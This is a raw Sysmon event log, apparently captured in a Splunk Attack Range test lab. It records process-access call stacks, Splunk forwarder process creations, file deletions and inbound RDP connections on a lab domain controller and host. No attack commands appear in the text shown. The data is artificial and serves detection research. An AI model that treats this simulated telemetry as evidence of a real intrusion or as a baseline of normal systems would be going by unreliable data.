08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053131Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053130Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053129Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053128Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.744{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053127Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.730{466BC892-F766-60EB-C47D-00000000CF01}3804C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001053126Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:42.547{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57412-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001053125Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.697{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C0905CFA060E52AA1C2B3730C84BA39,SHA256=30AF3EB42690827C2A734B6AE04946CA532B9869A537FE22B0298762B57A6BAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809674Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:50.275{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A9C431958C6A4AF1566D5E185A40A31,SHA256=449192DB822813F13DE84025DAACC0894D807E809D4334E69E105F12657DFC42,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053124Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.413{466BC892-F766-60EB-C37D-00000000CF01}97884460C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053123Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053122Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053121Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053120Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053119Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053118Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053117Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.160{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053116Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:50.130{466BC892-F766-60EB-C37D-00000000CF01}9788C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809673Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:48.575{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-16602-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000809672Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:48.372{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse122.226.223.195-49581-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809671Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:50.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02F6E6A8F42BB24DFBD5D85E6945EAC7,SHA256=C38425F6DC59071C6EEFB71FFF9CAC3378B3D24F58A30E52B6EA709CAB2226BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809670Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:50.010{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1B04D46919152AD43BE24CDB443DA8E9,SHA256=96F6F80C3060892AF320D0687DD3F60C5ECACA1B3DF333D5472720805A818BE0,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053156Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053155Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053154Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053153Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053152Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053151Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053150Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.957{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053149Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.942{466BC892-F767-60EB-C67D-00000000CF01}10152C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001053148Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.768{466BC892-F767-60EB-C57D-00000000CF01}89206332C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001053147Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:03:51.729{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06ADD1D11D5D0A696E4218D27FB574B0,SHA256=D4DB0205E214B537876909D7455806B8786B784DEF60453F56FD4252DB0D7583,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809676Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:03:51.307{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5170B8DF643F95C462179AC25E7B869,SHA256=1F2141DE98A1B3C2F89CDF44E64A2D4FFDF21D1458B3E1C584110DE860395E58,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053146Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 